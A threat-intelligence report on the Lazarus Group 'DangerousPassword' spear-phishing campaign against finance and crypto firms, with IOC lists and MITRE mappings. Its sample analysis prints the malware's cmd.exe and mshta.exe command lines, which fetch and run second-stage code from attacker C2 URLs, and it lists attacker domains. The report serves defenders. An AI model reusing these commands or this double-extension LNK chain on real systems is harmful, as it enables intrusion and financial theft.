Self Assessment

Tracking DangerousPassword Campaign by Lazarus Group

Published On : 2022-01-26
Share :
Tracking DangerousPassword Campaign by Lazarus Group

Out-of-Band Report – Tracking DangerousPassword Campaign by Lazarus Group

 

Attack Type: Social Engineering, Spear-Phishing, Malware Implant, Persistence, Defense Evasion, Vulnerabilities & Exploits
Objective: Financial Gain
Target Industry: Finance, Cryptocurrency
Target technology: Email, Windows
Business Impact: Financial Loss, Data Loss, Customer trust and reputation damage

 

Summary

Tracking of a large-scale spear-phishing campaign dubbed “DangerousPasword” after TTPs used. This campaign was previously observed targeting cryptocurrency and financial services businesses and employees across North America, Europe, and East Asia using the CageyChameleon or CryptoCore malware.

 

Tactics, Techniques and Procedures

The initial attack vector remains social engineering via LinkedIn and spear-phishing email campaigns. Malicious documents are adjusted to specific individuals, companies, or industries.

This latest campaign leverages the LNK infection chain via double extensions. Attackers are using two ways to trick users into running their malicious files.

First is a legitimately named document with an adequately changed file type icon using *.pdf.lnk or *.xlsx.lnk double extensions. Another way is presenting ZIP or RAR archive with a decoy document and malicious *.lnk files. In order to access the content of the decoy document users are instructed to open and allow these malicious .LNK files, most commonly masked as a password file such as “password.txt.lnk”.

Once opened, mshta.exe command is executed downloading the next stage. C2 domains are using cybersquatting to mimic legitimate services looking services.

After the second stage is downloaded and executed it establishes persistence in Windows Startup with another .LNK file named to look legitimate, for example, “UserAssist.lnk”. Once persistence is established, depending on the information gathered about the system, a relevant payload for privilege escalation and lateral movement is downloaded.

Attackers seem to go to great lengths to avoid providing the malicious file to third parties other than the original target. If you receive and open the malicious file, the lifetime of the URL that mshta.exe accesses are as short as the download URL of the malicious file.

 

Sample Analysis

Filename: New Salary Adjustments. zip
MD5: 8aeba2cd6c97e43de6b8703b22a74ec5
File type: ZIP
File size: 104.42 KB (106926 bytes)

ZIP archive contains the two files below. One is a benign decoy word document, second is a malicious double extension password file.

Decoy Document

Filename: Salary Report (November 2021).docx
MD5: 76d0e527201b0d39fcbed2ceb5de51c1
File type: MS Word Document
File size: 108.00 KB (110592 bytes)

Malicious double extension password file
Filename: Password.txt.lnk
MD5: 26cb5fdcbdfccfa05399709d7dc12319
File type: Windows shortcut
File size: 2.39 KB (2445 bytes)

Upon execution .LNK file calls C2 at “datacentre[.]center” via mshta.exe and downloads second stage .LNK file

cmd.exe “C:\Windows\System32\cmd.exe” /c start /wait “dLabxpSOEVLj” C:\Users\ADMINI~1\AppData\Local\Temp\Password.txt.lnk

cmd.exe “C:\Windows\System32\cmd.exe” /q /c c^o^py C:\Windows\system32\msh*.exe C:\Users\Public\* & for %i IN (C:\Users\Public\*.exe) DO start /b %~ni.exe “hxxps://www.datacentre[.]center/SXsM+YvBTwk+ziUZc1o9S4EjzfWp16u38lm/1DfZyGA=”

mshta.exe mshta.exe “hxxps://www.datacentre[.]center/SXsM+YvBTwk+ziUZc1o9S4EjzfWp16u38lm/1DfZyGA=”

Downloaded second stage file then establishes persistence in windows startup using :Assist.lnk”

Filename: Assist.lnk
MD5: 30ced44ccc466a0f0eda10f02c369eaf
File type: Windows shortcut
File size: 806.00 B (806 bytes)

cmd.exe “C:\Windows\System32\cmd.exe” /c start /wait “SHfcJxyrTAMTXr” C:\Users\ADMINI~1\AppData\Local\Temp\Assist.lnk

mshta.exe“C:\Windows\system32\mshta.exe” hxxps://www.datacentre[.]center/9AHGT1mqmOqhCSWl5mM3MSCuQvya9TRYL/XM7lFCb9c=

 

Discovering attacker’s malicious server

When pivoting on IOCs from sample above, we have identified malicious server on IP 149.28.162[.]113 used by attacker to host multiple malicious domains serving as C2 and malware droppers.

Out of 10 domains hosted on this server 7 have been linked to other samples of same .LNK infection chain technique. Remaining 3 have different registrar and are likely to be used in a different campaign by same threat actors.

 

Domains linked to malicious samples, registrar Porkbun LLC

Onlinedocpage[.]org
Onedocshare[.]com
Gsachshr[.]com
Docusign[.]agency
Fsdriveshare[.]org
Filesaves[.]cloud
Datacentre[.]center

Unlinked domain names, registrar Tucows Domains Inc.

Trollinguneaten[.]org
Pavestonecorset[.]com
Dubbedfinally[.]link

Observed filenamesin related samples

FiCas AG Job Description.lnk
New Profits Distributions_MATT.zip
Celsius Opportunities.gdoc.rar
Exchange Project Management Plan_Q3.2021.zip
profits.docx

IOC lists (full list attached in csv format) 

DangerousPassword_IOC_list

Analyzed sample IOC list

MD5
8aeba2cd6c97e43de6b8703b22a74ec5
76d0e527201b0d39fcbed2ceb5de51c1
26cb5fdcbdfccfa05399709d7dc12319
30ced44ccc466a0f0eda10f02c369eaf

URL
https://www.datacentre[.]center/SXsM+YvBTwk+ziUZc1o9S4EjzfWp16u38lm/1DfZyGA=
https://www.datacentre[.]center/9AHGT1mqmOqhCSWl5mM3MSCuQvya9TRYL/XM7lFCb9c=

Domains
datacentre[.]center
www.datacentre[.]center

IP Adresses
149.28.162[.]113

Malicious server IOC list

MD5

3c324706e3bae0b7187b134a813011cb
42e6310ffbdd24cf9a2b5d200190359e
4b9366f2dcab60d56d09e69e21d77d91
75733ee381ee80a07cfeddc6bddd91de
791e527a2082e6207d1ac9b9b4550fdf
84dd7ccb69d0010c97c1fc336650d5e2
8b9fee7600633e4017337d5b56613a59
8ce07870c4633f40d4f53d978b0a4334
934c7b7c31d84728f0086be9b80ee1e4
a0c1ca01548be7690f2976742f068e67
adefa310e925fcbd6f8aeea3bfb68afd
b139bb873c275a61730fbcb0145aed30
bed99a09a68eb8f8b53d2a9d0ccc085a
c44d866adf8c6845b7dda742c59c6b59
d0a5e14ce27abc2fa22a6bd7f4269e88
e0d2e5a8cafdc137d4006a21a80d7c8e
dec25c57bdc8c945ba975d0f693243cb

URL

http://share.stablemarket[.]org/S1IPLKWyhI+b8SZyQi2j2+5YFP1V6BFxXAUMRERH9O0=
http://share.stablemarket[.]org/Y5qbOQiIlBomxCjPRFzyiLSvyddx/P1xM4diDmKxL3I=
https://docs.gsheetpage[.]com/oqkoB0q32czSiIjgsw+S2lfzfm4dB3TLnrpSTyuEIxI=
https://drive.cloudplus[.]one/oq6pgiji+mhzwm0jzshhfcc9j8v8l0ovb+dokurm9ui=
https://drive.cloudplus[.]one/uhrdxjlm9w/srvifnoxscv94o6rneakrszugh3vgpr4=
https://file.fsdriveshare[.]org/EzPYymF4dURi4unzpPpMUhbHH0qFEhvmksDb3WHp2nE=
https://note.onedocshare[.]com/seZlG2VYJ6l05Yn4tvYj93t9eK3OX72pIMiW95JlhDY=om/seZlG2VYJ6l05Yn4tvYj93t9eK3OX72pIMiW95JlhDY=
https://ny.silvergatehr[.]com/5Ek9724mz8oncul8Zx7E7CVDCdBNxuFFUO6pLk/PEbM=
https://ny.silvergatehr[.]com/L55Utku3f6AJR7pawBASglEHsB8GxbL22B0j1e9VwdE=
https://share.stablemarket[.]org/AUeSdfDyTf7kMvSGKlVh8K9Z1FjBuP9bJrv/Zqtwi+g=
https://share.stablemarket[.]org/S1IPLKWyhI+b8SZyQi2j2+5YFP1V6BFxXAUMRERH9O0=
https://share.stablemarket[.]org/Y5qbOQiIlBomxCjPRFzyiLSvyddx/P1xM4diDmKxL3I=
https://www.datacentre[.]center/9AHGT1mqmOqhCSWl5mM3MSCuQvya9TRYL/XM7lFCb9c=
https://www.datacentre[.]center/cb9LnI7Gx5NWKkw6wfDLQxqvKdYLqNt0HnV2tw5Zosc=
https://www.datacentre[.]center/OADS+RcTS6DtX8081Cv+0admTqzBk4Cbowz+JbpwM7o=
https://www.docusign[.]agency/jZqVFMZ9mf2WF5TkgEeGRZ2si09QqjBAcdHN46XpjRs=
https://www.docusign[.]agency/WG70GuIDhXvWk3S/fCfLkC7ZY+OrTXcMwgTMH51xNzM=
https://www.onlinedocpage[.]org/FcsDjkkPVjEsM6htE+uWxoDY7HoSX64xIHgNAoq6SF4=
https://www.onlinedocpage[.]org/sNMrUsSs7KdzaPqHi7g8lOL/6QEFrel2WwzIvO2/TEI=

Domains

datacentre.center
docusign.agency
fsdriveshare.org
gsachshr.com
ilesaves.cloud
onedocshare.com
onlinedocpage.org
filesaves.cloud

dmarc.fsdriveshare.org
doc.filesaves.cloud
docs.gsheetpage.com
drive.cloudplus.one
file.fsdriveshare.org
license.cloudplus.one
link.onlinedocpage.org
note.onedocshare.com
ny.silvergatehr.com
product.onlinedoc.dev
share.cloudmgmt.org
share.fsdriveshare.org
share.stablemarket.org
sheet.tresordocs.com
support.pilotview.cloud
www.datacentre.center
www.docusign.agency
www.gsachshr.com
www.onlinedocpage.org

Trollinguneaten.org
Pavestonecorset.com
Dubbedfinally.link
IP Adresses
149.28.162[.]113

 

ATT&CK MITRE Matrix

Technique ID Technique description Tactic description
T1055 Process Injection Privilege Escalation
T1112 Modify Registry Defense Evasion
T1218.005 Mshta Defense Evasion
T1497 Virtualization/Sandbox Evasion Defense Evasion
T1012 Query Registry Discovery
T1120 Peripheral Device Discovery Discovery